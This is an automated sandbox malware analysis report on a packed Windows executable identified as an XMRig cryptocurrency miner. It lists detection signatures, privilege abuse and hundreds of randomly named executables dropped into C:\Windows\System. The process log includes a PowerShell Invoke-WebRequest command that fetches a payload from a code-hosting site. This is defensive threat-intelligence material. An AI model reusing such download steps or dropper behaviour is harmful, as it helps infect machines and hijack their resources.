Malware Analysis Report

2024-11-16 10:57

Sample ID 240614-heflvsyejd
Target a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe
SHA256 aa7da92583976a583149e334ced84c33b40649c2649262e72571e97c756e038a
Tags miner upx xmrig execution
Score 10/10

Analysis Overview

score
10/10

SHA256

aa7da92583976a583149e334ced84c33b40649c2649262e72571e97c756e038a

Threat Level: Known bad

The file a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe was found to be: Known bad.

Malicious Activity Summary

miner upx xmrig execution

Xmrig family

XMRig Miner payload

xmrig

Command and Scripting Interpreter: PowerShell

Executes dropped EXE

Loads dropped DLL

UPX packed file

Legitimate hosting services abused for malware hosting/C2

Drops file in System32 directory

Drops file in Windows directory

Unsigned PE

Enumerates system info in registry

Suspicious use of WriteProcessMemory

Modifies data under HKEY_USERS

Checks processor information in registry

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-14 06:38

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Xmrig family

xmrig

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-14 06:38

Reported

2024-06-14 06:41

Platform

win7-20240220-en

Max time kernel

150s

Max time network

142s

Command Line

"C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target

Processes

C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "


C:\Windows\System\oYIBqvn.exe

C:\Windows\System\oYIBqvn.exe

C:\Windows\System\CsBJvjo.exe

C:\Windows\System\CsBJvjo.exe

C:\Windows\System\jqzAJQP.exe

C:\Windows\System\jqzAJQP.exe

C:\Windows\System\JJJYJfU.exe

C:\Windows\System\JJJYJfU.exe

C:\Windows\System\GReOrIP.exe

C:\Windows\System\GReOrIP.exe

C:\Windows\System\XyHvVpA.exe

C:\Windows\System\XyHvVpA.exe

C:\Windows\System\EOQTXLP.exe

C:\Windows\System\EOQTXLP.exe

C:\Windows\System\ttlfyMG.exe

C:\Windows\System\ttlfyMG.exe

C:\Windows\System\HTkkGFC.exe

C:\Windows\System\HTkkGFC.exe

C:\Windows\System\FwjCkpC.exe

C:\Windows\System\FwjCkpC.exe

C:\Windows\System\XtQvCyF.exe

C:\Windows\System\XtQvCyF.exe

C:\Windows\System\eJHmOgg.exe

C:\Windows\System\eJHmOgg.exe

C:\Windows\System\XoHwDvF.exe

C:\Windows\System\XoHwDvF.exe

C:\Windows\System\OtfSYgv.exe

C:\Windows\System\OtfSYgv.exe

C:\Windows\System\koRmgDn.exe

C:\Windows\System\koRmgDn.exe

C:\Windows\System\wzQquCS.exe

C:\Windows\System\wzQquCS.exe

C:\Windows\System\gExyNXf.exe

C:\Windows\System\gExyNXf.exe

C:\Windows\System\qwdpMfY.exe

C:\Windows\System\qwdpMfY.exe

C:\Windows\System\ZMkdTxg.exe

C:\Windows\System\ZMkdTxg.exe

C:\Windows\System\lythbGR.exe

C:\Windows\System\lythbGR.exe

C:\Windows\System\WAYqubZ.exe

C:\Windows\System\WAYqubZ.exe

C:\Windows\System\XNmrsHv.exe

C:\Windows\System\XNmrsHv.exe

C:\Windows\System\FPRBOvf.exe

C:\Windows\System\FPRBOvf.exe

C:\Windows\System\PlJkRby.exe

C:\Windows\System\PlJkRby.exe

C:\Windows\System\hlujmtk.exe

C:\Windows\System\hlujmtk.exe

C:\Windows\System\YcnxVMM.exe

C:\Windows\System\YcnxVMM.exe

C:\Windows\System\aKggNTF.exe

C:\Windows\System\aKggNTF.exe

C:\Windows\System\LjKoTgk.exe

C:\Windows\System\LjKoTgk.exe

C:\Windows\System\vFYZExp.exe

C:\Windows\System\vFYZExp.exe

C:\Windows\System\nmvkuMc.exe

C:\Windows\System\nmvkuMc.exe

C:\Windows\System\aoZlLSb.exe

C:\Windows\System\aoZlLSb.exe

C:\Windows\System\sBeEgDi.exe

C:\Windows\System\sBeEgDi.exe

C:\Windows\System\dEjqCek.exe

C:\Windows\System\dEjqCek.exe

C:\Windows\System\xChEbKN.exe

C:\Windows\System\xChEbKN.exe

C:\Windows\System\ztjWPrQ.exe

C:\Windows\System\ztjWPrQ.exe

C:\Windows\System\jUJEywH.exe

C:\Windows\System\jUJEywH.exe

C:\Windows\System\MjXBaHB.exe

C:\Windows\System\MjXBaHB.exe

C:\Windows\System\ORzScDZ.exe

C:\Windows\System\ORzScDZ.exe

C:\Windows\System\SdXerbV.exe

C:\Windows\System\SdXerbV.exe

C:\Windows\System\QkaEDKY.exe

C:\Windows\System\QkaEDKY.exe

C:\Windows\System\nqzPiHK.exe

C:\Windows\System\nqzPiHK.exe

C:\Windows\System\BecoGRf.exe

C:\Windows\System\BecoGRf.exe

C:\Windows\System\Renqtxh.exe

C:\Windows\System\Renqtxh.exe

C:\Windows\System\EUKgJaY.exe

C:\Windows\System\EUKgJaY.exe

C:\Windows\System\ifqiWFw.exe

C:\Windows\System\ifqiWFw.exe

C:\Windows\System\KFukTmj.exe

C:\Windows\System\KFukTmj.exe

C:\Windows\System\GPtCkpU.exe

C:\Windows\System\GPtCkpU.exe

C:\Windows\System\GQDqlhl.exe

C:\Windows\System\GQDqlhl.exe

C:\Windows\System\SLevcVS.exe

C:\Windows\System\SLevcVS.exe

C:\Windows\System\ujlCLjO.exe

C:\Windows\System\ujlCLjO.exe

C:\Windows\System\oojgjmw.exe

C:\Windows\System\oojgjmw.exe

C:\Windows\System\dIplOjg.exe

C:\Windows\System\dIplOjg.exe

C:\Windows\System\RPtlMPT.exe

C:\Windows\System\RPtlMPT.exe

C:\Windows\System\JFPPcAk.exe

C:\Windows\System\JFPPcAk.exe

C:\Windows\System\sJAObgH.exe

C:\Windows\System\sJAObgH.exe

C:\Windows\System\cvssDeS.exe

C:\Windows\System\cvssDeS.exe

C:\Windows\System\kbljEeA.exe

C:\Windows\System\kbljEeA.exe

C:\Windows\System\JBSdmgf.exe

C:\Windows\System\JBSdmgf.exe

C:\Windows\System\hXzTsgx.exe

C:\Windows\System\hXzTsgx.exe

C:\Windows\System\zsSlUxo.exe

C:\Windows\System\zsSlUxo.exe

C:\Windows\System\DTzugDN.exe

C:\Windows\System\DTzugDN.exe

C:\Windows\System\ZRmxtqp.exe

C:\Windows\System\ZRmxtqp.exe

C:\Windows\System\nNRZlKp.exe

C:\Windows\System\nNRZlKp.exe

C:\Windows\System\LCBkrHm.exe

C:\Windows\System\LCBkrHm.exe

C:\Windows\System\YeyNpsV.exe

C:\Windows\System\YeyNpsV.exe

C:\Windows\System\rzNVLrq.exe

C:\Windows\System\rzNVLrq.exe

C:\Windows\System\ptMlUlW.exe

C:\Windows\System\ptMlUlW.exe

C:\Windows\System\LWmCYGS.exe

C:\Windows\System\LWmCYGS.exe

C:\Windows\System\NzJYmhc.exe

C:\Windows\System\NzJYmhc.exe

C:\Windows\System\thnqHRn.exe

C:\Windows\System\thnqHRn.exe

C:\Windows\System\UiSsJIV.exe

C:\Windows\System\UiSsJIV.exe

C:\Windows\System\tizdorf.exe

C:\Windows\System\tizdorf.exe

C:\Windows\System\TsjGrui.exe

C:\Windows\System\TsjGrui.exe

C:\Windows\System\mJRYuhz.exe

C:\Windows\System\mJRYuhz.exe

C:\Windows\System\oyFZTat.exe

C:\Windows\System\oyFZTat.exe

C:\Windows\System\ljbhEeC.exe

C:\Windows\System\ljbhEeC.exe

C:\Windows\System\thmjToq.exe

C:\Windows\System\thmjToq.exe

C:\Windows\System\QxVqVfr.exe

C:\Windows\System\QxVqVfr.exe

C:\Windows\System\PZUsbjl.exe

C:\Windows\System\PZUsbjl.exe

C:\Windows\System\TeCPJUG.exe

C:\Windows\System\TeCPJUG.exe

C:\Windows\System\gpXcMZW.exe

C:\Windows\System\gpXcMZW.exe

C:\Windows\System\aRYUjPS.exe

C:\Windows\System\aRYUjPS.exe

C:\Windows\System\YuAlFMH.exe

C:\Windows\System\YuAlFMH.exe

C:\Windows\System\CenCfPZ.exe

C:\Windows\System\CenCfPZ.exe

C:\Windows\System\uYdPhoQ.exe

C:\Windows\System\uYdPhoQ.exe

C:\Windows\System\UkCDeuV.exe

C:\Windows\System\UkCDeuV.exe

C:\Windows\System\nwuUqoV.exe

C:\Windows\System\nwuUqoV.exe

C:\Windows\System\STsTOWk.exe

C:\Windows\System\STsTOWk.exe

C:\Windows\System\ABOkTrm.exe

C:\Windows\System\ABOkTrm.exe

C:\Windows\System\PeftUOE.exe

C:\Windows\System\PeftUOE.exe

C:\Windows\System\gZHUkJX.exe

C:\Windows\System\gZHUkJX.exe

C:\Windows\System\aWtoPJg.exe

C:\Windows\System\aWtoPJg.exe

C:\Windows\System\vRGjWLN.exe

C:\Windows\System\vRGjWLN.exe

C:\Windows\System\rZPMBVT.exe

C:\Windows\System\rZPMBVT.exe

C:\Windows\System\BSXwzYN.exe

C:\Windows\System\BSXwzYN.exe

C:\Windows\System\YCTcYJx.exe

C:\Windows\System\YCTcYJx.exe

C:\Windows\System\durJDTK.exe

C:\Windows\System\durJDTK.exe

C:\Windows\System\tDmGycF.exe

C:\Windows\System\tDmGycF.exe

C:\Windows\System\hwQHlFc.exe

C:\Windows\System\hwQHlFc.exe

C:\Windows\System\SWDONxa.exe

C:\Windows\System\SWDONxa.exe

C:\Windows\System\uocqxqR.exe

C:\Windows\System\uocqxqR.exe

C:\Windows\System\HhFIzye.exe

C:\Windows\System\HhFIzye.exe

C:\Windows\System\ESupQTZ.exe

C:\Windows\System\ESupQTZ.exe

C:\Windows\System\ZpEqXvd.exe

C:\Windows\System\ZpEqXvd.exe

C:\Windows\System\FAHOLdY.exe

C:\Windows\System\FAHOLdY.exe

C:\Windows\System\CmZfdsI.exe

C:\Windows\System\CmZfdsI.exe

C:\Windows\System\FBxeGxn.exe

C:\Windows\System\FBxeGxn.exe

C:\Windows\System\ilmSYYF.exe

C:\Windows\System\ilmSYYF.exe

C:\Windows\System\FssScGW.exe

C:\Windows\System\FssScGW.exe

C:\Windows\System\ClrpHTP.exe

C:\Windows\System\ClrpHTP.exe

C:\Windows\System\FrvsIxy.exe

C:\Windows\System\FrvsIxy.exe

C:\Windows\System\hMzBhqN.exe

C:\Windows\System\hMzBhqN.exe

C:\Windows\System\yzOtsHR.exe

C:\Windows\System\yzOtsHR.exe

C:\Windows\System\chBSJpG.exe

C:\Windows\System\chBSJpG.exe

C:\Windows\System\FSjNbCL.exe

C:\Windows\System\FSjNbCL.exe

C:\Windows\System\RZArlOh.exe

C:\Windows\System\RZArlOh.exe

C:\Windows\System\IZcUoDN.exe

C:\Windows\System\IZcUoDN.exe

C:\Windows\System\RZlCniO.exe

C:\Windows\System\RZlCniO.exe

C:\Windows\System\sHiOnLC.exe

C:\Windows\System\sHiOnLC.exe

C:\Windows\System\tyDkXTo.exe

C:\Windows\System\tyDkXTo.exe

C:\Windows\System\OwiWZjA.exe

C:\Windows\System\OwiWZjA.exe

C:\Windows\System\InRkDiD.exe

C:\Windows\System\InRkDiD.exe

C:\Windows\System\WJzCrlC.exe

C:\Windows\System\WJzCrlC.exe

C:\Windows\System\LdwAhFI.exe

C:\Windows\System\LdwAhFI.exe

C:\Windows\System\MDopUCy.exe

C:\Windows\System\MDopUCy.exe

C:\Windows\System\KEWFbtA.exe

C:\Windows\System\KEWFbtA.exe

C:\Windows\System\LCCMmNb.exe

C:\Windows\System\LCCMmNb.exe

C:\Windows\System\KNvaoRn.exe

C:\Windows\System\KNvaoRn.exe

C:\Windows\System\tnhjMpT.exe

C:\Windows\System\tnhjMpT.exe

C:\Windows\System\edelavJ.exe

C:\Windows\System\edelavJ.exe

C:\Windows\System\JUEqgkD.exe

C:\Windows\System\JUEqgkD.exe

C:\Windows\System\xxtiyJI.exe

C:\Windows\System\xxtiyJI.exe

C:\Windows\System\flHsNXr.exe

C:\Windows\System\flHsNXr.exe

C:\Windows\System\izzXrvW.exe

C:\Windows\System\izzXrvW.exe

C:\Windows\System\YUuYGmS.exe

C:\Windows\System\YUuYGmS.exe

C:\Windows\System\fQtXqZA.exe

C:\Windows\System\fQtXqZA.exe

C:\Windows\System\TjwqSay.exe

C:\Windows\System\TjwqSay.exe

C:\Windows\System\gJYOaEM.exe

C:\Windows\System\gJYOaEM.exe

C:\Windows\System\XMVHsJF.exe

C:\Windows\System\XMVHsJF.exe

C:\Windows\System\fbhzBHH.exe

C:\Windows\System\fbhzBHH.exe

C:\Windows\System\OeQvzGY.exe

C:\Windows\System\OeQvzGY.exe

C:\Windows\System\CGmYIBA.exe

C:\Windows\System\CGmYIBA.exe

C:\Windows\System\NYByIjr.exe

C:\Windows\System\NYByIjr.exe

C:\Windows\System\xUVNVkt.exe

C:\Windows\System\xUVNVkt.exe

C:\Windows\System\AJjSJQV.exe

C:\Windows\System\AJjSJQV.exe

C:\Windows\System\bxVlcjF.exe

C:\Windows\System\bxVlcjF.exe

C:\Windows\System\GAISfMH.exe

C:\Windows\System\GAISfMH.exe

C:\Windows\System\ZNHCBAE.exe

C:\Windows\System\ZNHCBAE.exe

C:\Windows\System\INFhxHd.exe

C:\Windows\System\INFhxHd.exe

C:\Windows\System\DWCkBvl.exe

C:\Windows\System\DWCkBvl.exe

C:\Windows\System\yPZWKae.exe

C:\Windows\System\yPZWKae.exe

C:\Windows\System\ECrntnX.exe

C:\Windows\System\ECrntnX.exe

C:\Windows\System\NzFxgCc.exe

C:\Windows\System\NzFxgCc.exe

C:\Windows\System\NmVDisb.exe

C:\Windows\System\NmVDisb.exe

C:\Windows\System\oJxFaMa.exe

C:\Windows\System\oJxFaMa.exe

C:\Windows\System\GHGrSSU.exe

C:\Windows\System\GHGrSSU.exe

C:\Windows\System\thXrFnL.exe

C:\Windows\System\thXrFnL.exe

C:\Windows\System\GVPYehw.exe

C:\Windows\System\GVPYehw.exe

C:\Windows\System\JxqvmDq.exe

C:\Windows\System\JxqvmDq.exe

C:\Windows\System\SiTASqx.exe

C:\Windows\System\SiTASqx.exe

C:\Windows\System\PKpDPkQ.exe

C:\Windows\System\PKpDPkQ.exe

C:\Windows\System\CdcfYOx.exe

C:\Windows\System\CdcfYOx.exe

C:\Windows\System\nbZublW.exe

C:\Windows\System\nbZublW.exe

C:\Windows\System\PefgiWq.exe

C:\Windows\System\PefgiWq.exe

C:\Windows\System\bUwwpDu.exe

C:\Windows\System\bUwwpDu.exe

C:\Windows\System\IRWofIc.exe

C:\Windows\System\IRWofIc.exe

C:\Windows\System\PVSOwOT.exe

C:\Windows\System\PVSOwOT.exe

C:\Windows\System\EXmZAhA.exe

C:\Windows\System\EXmZAhA.exe

C:\Windows\System\QkJJaoe.exe

C:\Windows\System\QkJJaoe.exe

C:\Windows\System\kFrUqYA.exe

C:\Windows\System\kFrUqYA.exe

C:\Windows\System\fxHbQzP.exe

C:\Windows\System\fxHbQzP.exe

C:\Windows\System\hYHEqty.exe

C:\Windows\System\hYHEqty.exe

C:\Windows\System\guqzLmR.exe

C:\Windows\System\guqzLmR.exe

C:\Windows\System\wSAvHGl.exe

C:\Windows\System\wSAvHGl.exe

C:\Windows\System\sFaleNs.exe

C:\Windows\System\sFaleNs.exe

C:\Windows\System\mZHeKZK.exe

C:\Windows\System\mZHeKZK.exe

C:\Windows\System\GKMubSz.exe

C:\Windows\System\GKMubSz.exe

C:\Windows\System\XtLZuLa.exe

C:\Windows\System\XtLZuLa.exe

C:\Windows\System\ccqScHc.exe

C:\Windows\System\ccqScHc.exe

C:\Windows\System\xMZNLVW.exe

C:\Windows\System\xMZNLVW.exe

C:\Windows\System\SraZJFB.exe

C:\Windows\System\SraZJFB.exe

C:\Windows\System\MNieSht.exe

C:\Windows\System\MNieSht.exe

C:\Windows\System\lQqqejF.exe

C:\Windows\System\lQqqejF.exe

C:\Windows\System\YMtwARY.exe

C:\Windows\System\YMtwARY.exe

C:\Windows\System\xruMsPw.exe

C:\Windows\System\xruMsPw.exe

C:\Windows\System\HyeeGAO.exe

C:\Windows\System\HyeeGAO.exe

C:\Windows\System\NCnhyDA.exe

C:\Windows\System\NCnhyDA.exe

C:\Windows\System\zhjzFak.exe

C:\Windows\System\zhjzFak.exe

C:\Windows\System\krVlBLJ.exe

C:\Windows\System\krVlBLJ.exe

C:\Windows\System\vMiOChS.exe

C:\Windows\System\vMiOChS.exe

C:\Windows\System\PoEJXfk.exe

C:\Windows\System\PoEJXfk.exe

C:\Windows\System\cfJZlNT.exe

C:\Windows\System\cfJZlNT.exe

C:\Windows\System\WWBpkvY.exe

C:\Windows\System\WWBpkvY.exe

C:\Windows\System\RdeIvTn.exe

C:\Windows\System\RdeIvTn.exe

C:\Windows\System\wXpZNtt.exe

C:\Windows\System\wXpZNtt.exe

C:\Windows\System\bJlFOVZ.exe

C:\Windows\System\bJlFOVZ.exe

C:\Windows\System\zUKNoDH.exe

C:\Windows\System\zUKNoDH.exe

C:\Windows\System\ZtLanQo.exe

C:\Windows\System\ZtLanQo.exe

C:\Windows\System\xUrsdzi.exe

C:\Windows\System\xUrsdzi.exe

C:\Windows\System\MVrblEM.exe

C:\Windows\System\MVrblEM.exe

C:\Windows\System\wkXGVvW.exe

C:\Windows\System\wkXGVvW.exe

C:\Windows\System\qjhcJrA.exe

C:\Windows\System\qjhcJrA.exe

C:\Windows\System\xqJTyKM.exe

C:\Windows\System\xqJTyKM.exe

C:\Windows\System\PJtUMlL.exe

C:\Windows\System\PJtUMlL.exe

C:\Windows\System\CnSVAWR.exe

C:\Windows\System\CnSVAWR.exe

C:\Windows\System\mKqeGFX.exe

C:\Windows\System\mKqeGFX.exe

C:\Windows\System\FlbGUjV.exe

C:\Windows\System\FlbGUjV.exe

C:\Windows\System\CbaAyiw.exe

C:\Windows\System\CbaAyiw.exe

C:\Windows\System\sawOSyL.exe

C:\Windows\System\sawOSyL.exe

C:\Windows\System\winikXz.exe

C:\Windows\System\winikXz.exe

C:\Windows\System\KaLgCPl.exe

C:\Windows\System\KaLgCPl.exe

C:\Windows\System\DdJlClv.exe

C:\Windows\System\DdJlClv.exe

C:\Windows\System\JVCUisM.exe

C:\Windows\System\JVCUisM.exe

C:\Windows\System\JIhjQGn.exe

C:\Windows\System\JIhjQGn.exe

C:\Windows\System\RtiTgXi.exe

C:\Windows\System\RtiTgXi.exe

C:\Windows\System\NxakUvz.exe

C:\Windows\System\NxakUvz.exe

C:\Windows\System\SMVgfUi.exe

C:\Windows\System\SMVgfUi.exe

C:\Windows\System\RdVtLjC.exe

C:\Windows\System\RdVtLjC.exe

C:\Windows\System\OlnbGKb.exe

C:\Windows\System\OlnbGKb.exe

C:\Windows\System\LxwwLPY.exe

C:\Windows\System\LxwwLPY.exe

C:\Windows\System\OlIzkFD.exe

C:\Windows\System\OlIzkFD.exe

C:\Windows\System\wJbenKO.exe

C:\Windows\System\wJbenKO.exe

C:\Windows\System\Wfjssqr.exe

C:\Windows\System\Wfjssqr.exe

C:\Windows\System\ojbxYhL.exe

C:\Windows\System\ojbxYhL.exe

C:\Windows\System\ocNwVdZ.exe

C:\Windows\System\ocNwVdZ.exe

C:\Windows\System\XiUsJgF.exe

C:\Windows\System\XiUsJgF.exe

C:\Windows\System\vCRFefx.exe

C:\Windows\System\vCRFefx.exe

C:\Windows\System\DzwNiwh.exe

C:\Windows\System\DzwNiwh.exe

C:\Windows\System\vwozxry.exe

C:\Windows\System\vwozxry.exe

C:\Windows\System\WCAxjrZ.exe

C:\Windows\System\WCAxjrZ.exe

C:\Windows\System\LSoXSSm.exe

C:\Windows\System\LSoXSSm.exe

C:\Windows\System\GAriNmw.exe

C:\Windows\System\GAriNmw.exe

C:\Windows\System\TOQaLWX.exe

C:\Windows\System\TOQaLWX.exe

C:\Windows\System\aSHFDTY.exe

C:\Windows\System\aSHFDTY.exe

C:\Windows\System\UJlyfvc.exe

C:\Windows\System\UJlyfvc.exe

C:\Windows\System\FOxErTL.exe

C:\Windows\System\FOxErTL.exe

C:\Windows\System\cbUJmHK.exe

C:\Windows\System\cbUJmHK.exe

C:\Windows\System\CXYWhfN.exe

C:\Windows\System\CXYWhfN.exe

C:\Windows\System\UNXtQtS.exe

C:\Windows\System\UNXtQtS.exe

C:\Windows\System\CqbInHI.exe

C:\Windows\System\CqbInHI.exe

C:\Windows\System\DKwSlEG.exe

C:\Windows\System\DKwSlEG.exe

C:\Windows\System\mrmMRxm.exe

C:\Windows\System\mrmMRxm.exe

C:\Windows\System\OKVNRbz.exe

C:\Windows\System\OKVNRbz.exe

C:\Windows\System\KmYGTkD.exe

C:\Windows\System\KmYGTkD.exe

C:\Windows\System\KaAOOhb.exe

C:\Windows\System\KaAOOhb.exe

C:\Windows\System\ZKjHtPZ.exe

C:\Windows\System\ZKjHtPZ.exe

C:\Windows\System\DKcZvzP.exe

C:\Windows\System\DKcZvzP.exe

C:\Windows\System\qbEChdR.exe

C:\Windows\System\qbEChdR.exe

C:\Windows\System\oVKdHIr.exe

C:\Windows\System\oVKdHIr.exe

C:\Windows\System\THsYgLh.exe

C:\Windows\System\THsYgLh.exe

C:\Windows\System\LszSZcf.exe

C:\Windows\System\LszSZcf.exe

C:\Windows\System\kbcYEPb.exe

C:\Windows\System\kbcYEPb.exe

C:\Windows\System\LEaeeKJ.exe

C:\Windows\System\LEaeeKJ.exe

C:\Windows\System\VoVJdrZ.exe

C:\Windows\System\VoVJdrZ.exe

C:\Windows\System\AZHWJaM.exe

C:\Windows\System\AZHWJaM.exe

C:\Windows\System\NuvpYCY.exe

C:\Windows\System\NuvpYCY.exe

C:\Windows\System\cvjZEUO.exe

C:\Windows\System\cvjZEUO.exe

C:\Windows\System\oWemDvA.exe

C:\Windows\System\oWemDvA.exe

C:\Windows\System\RylxPQl.exe

C:\Windows\System\RylxPQl.exe

C:\Windows\System\LkHYNQV.exe

C:\Windows\System\LkHYNQV.exe

C:\Windows\System\WWceFuV.exe

C:\Windows\System\WWceFuV.exe

C:\Windows\System\fsuRMmD.exe

C:\Windows\System\fsuRMmD.exe

C:\Windows\System\TSqWXRn.exe

C:\Windows\System\TSqWXRn.exe

C:\Windows\System\wfQoBqt.exe

C:\Windows\System\wfQoBqt.exe

C:\Windows\System\dfDRWrp.exe

C:\Windows\System\dfDRWrp.exe

C:\Windows\System\BjcYnjI.exe

C:\Windows\System\BjcYnjI.exe

C:\Windows\System\NAwUdKg.exe

C:\Windows\System\NAwUdKg.exe

C:\Windows\System\nWbQbXk.exe

C:\Windows\System\nWbQbXk.exe

C:\Windows\System\UYwYiRv.exe

C:\Windows\System\UYwYiRv.exe

C:\Windows\System\IHOGKTU.exe

C:\Windows\System\IHOGKTU.exe

C:\Windows\System\BsPuSnf.exe

C:\Windows\System\BsPuSnf.exe

C:\Windows\System\JOchnbK.exe

C:\Windows\System\JOchnbK.exe

C:\Windows\System\SiKuFUe.exe

C:\Windows\System\SiKuFUe.exe

C:\Windows\System\lhwmfnQ.exe

C:\Windows\System\lhwmfnQ.exe

C:\Windows\System\NAuQajU.exe

C:\Windows\System\NAuQajU.exe

C:\Windows\System\TLZrKGq.exe

C:\Windows\System\TLZrKGq.exe

C:\Windows\System\tatQIfU.exe

C:\Windows\System\tatQIfU.exe

C:\Windows\System\qnsqArD.exe

C:\Windows\System\qnsqArD.exe

C:\Windows\System\pVQvExn.exe

C:\Windows\System\pVQvExn.exe

C:\Windows\System\QncycgO.exe

C:\Windows\System\QncycgO.exe

C:\Windows\System\vGyfsLj.exe

C:\Windows\System\vGyfsLj.exe

C:\Windows\System\JxSiGxV.exe

C:\Windows\System\JxSiGxV.exe

C:\Windows\System\HBsClyB.exe

C:\Windows\System\HBsClyB.exe

C:\Windows\System\wacxDkr.exe

C:\Windows\System\wacxDkr.exe

C:\Windows\System\KWcxwxc.exe

C:\Windows\System\KWcxwxc.exe

C:\Windows\System\wwSVolW.exe

C:\Windows\System\wwSVolW.exe

C:\Windows\System\PWRMIJn.exe

C:\Windows\System\PWRMIJn.exe

C:\Windows\System\DQWYimf.exe

C:\Windows\System\DQWYimf.exe

C:\Windows\System\nkuthni.exe

C:\Windows\System\nkuthni.exe

C:\Windows\System\hFlERvR.exe

C:\Windows\System\hFlERvR.exe

C:\Windows\System\WioiyTy.exe

C:\Windows\System\WioiyTy.exe

C:\Windows\System\xXXlkVb.exe

C:\Windows\System\xXXlkVb.exe

C:\Windows\System\FhobRQq.exe

C:\Windows\System\FhobRQq.exe

C:\Windows\System\YiNSUFK.exe

C:\Windows\System\YiNSUFK.exe

C:\Windows\System\TVIrQmU.exe

C:\Windows\System\TVIrQmU.exe

C:\Windows\System\PuMvTFy.exe

C:\Windows\System\PuMvTFy.exe

C:\Windows\System\TGSGXpN.exe

C:\Windows\System\TGSGXpN.exe

C:\Windows\System\qNhVivQ.exe

C:\Windows\System\qNhVivQ.exe

C:\Windows\System\otKhSVX.exe

C:\Windows\System\otKhSVX.exe

C:\Windows\System\lpmsPpD.exe

C:\Windows\System\lpmsPpD.exe

C:\Windows\System\IUSwybB.exe

C:\Windows\System\IUSwybB.exe

C:\Windows\System\ynoeieu.exe

C:\Windows\System\ynoeieu.exe

C:\Windows\System\skKdYVQ.exe

C:\Windows\System\skKdYVQ.exe

C:\Windows\System\MbeDgKF.exe

C:\Windows\System\MbeDgKF.exe

C:\Windows\System\cpKphjX.exe

C:\Windows\System\cpKphjX.exe

C:\Windows\System\ycLZfUp.exe

C:\Windows\System\ycLZfUp.exe

C:\Windows\System\iscZnAb.exe

C:\Windows\System\iscZnAb.exe

C:\Windows\System\MJkxisH.exe

C:\Windows\System\MJkxisH.exe

C:\Windows\System\NMKJIjC.exe

C:\Windows\System\NMKJIjC.exe

C:\Windows\System\FSMZZjU.exe

C:\Windows\System\FSMZZjU.exe

C:\Windows\System\NHfWbmh.exe

C:\Windows\System\NHfWbmh.exe

C:\Windows\System\fyOFjrZ.exe

C:\Windows\System\fyOFjrZ.exe

C:\Windows\System\MlRJAJy.exe

C:\Windows\System\MlRJAJy.exe

C:\Windows\System\zHENtJb.exe

C:\Windows\System\zHENtJb.exe

C:\Windows\System\vCGLSzY.exe

C:\Windows\System\vCGLSzY.exe

C:\Windows\System\eXTQtFS.exe

C:\Windows\System\eXTQtFS.exe

C:\Windows\System\MoTtQLo.exe

C:\Windows\System\MoTtQLo.exe

C:\Windows\System\nPgQFQW.exe

C:\Windows\System\nPgQFQW.exe

C:\Windows\System\aLIWHxJ.exe

C:\Windows\System\aLIWHxJ.exe

C:\Windows\System\QSIurCy.exe

C:\Windows\System\QSIurCy.exe

C:\Windows\System\TWXlSKe.exe

C:\Windows\System\TWXlSKe.exe

C:\Windows\System\UbJYagm.exe

C:\Windows\System\UbJYagm.exe

C:\Windows\System\VNIStRv.exe

C:\Windows\System\VNIStRv.exe

C:\Windows\System\uhLJXjO.exe

C:\Windows\System\uhLJXjO.exe

C:\Windows\System\gRBROGB.exe

C:\Windows\System\gRBROGB.exe

C:\Windows\System\UawdVfb.exe

C:\Windows\System\UawdVfb.exe

C:\Windows\System\dLrcsLD.exe

C:\Windows\System\dLrcsLD.exe

C:\Windows\System\etVyFWT.exe

C:\Windows\System\etVyFWT.exe

C:\Windows\System\fshTpAc.exe

C:\Windows\System\fshTpAc.exe

C:\Windows\System\QtUvjfv.exe

C:\Windows\System\QtUvjfv.exe

C:\Windows\System\hirqdvN.exe

C:\Windows\System\hirqdvN.exe

C:\Windows\System\wkeLnOg.exe

C:\Windows\System\wkeLnOg.exe

C:\Windows\System\MCJvABy.exe

C:\Windows\System\MCJvABy.exe

C:\Windows\System\akuzazy.exe

C:\Windows\System\akuzazy.exe

C:\Windows\System\WtdJjbo.exe

C:\Windows\System\WtdJjbo.exe

C:\Windows\System\bFFGFZx.exe

C:\Windows\System\bFFGFZx.exe

C:\Windows\System\UHrsSvz.exe

C:\Windows\System\UHrsSvz.exe

C:\Windows\System\sfVNZwx.exe

C:\Windows\System\sfVNZwx.exe

C:\Windows\System\THQUeOt.exe

C:\Windows\System\THQUeOt.exe

C:\Windows\System\LAqJQMA.exe

C:\Windows\System\LAqJQMA.exe

C:\Windows\System\zKVdiUu.exe

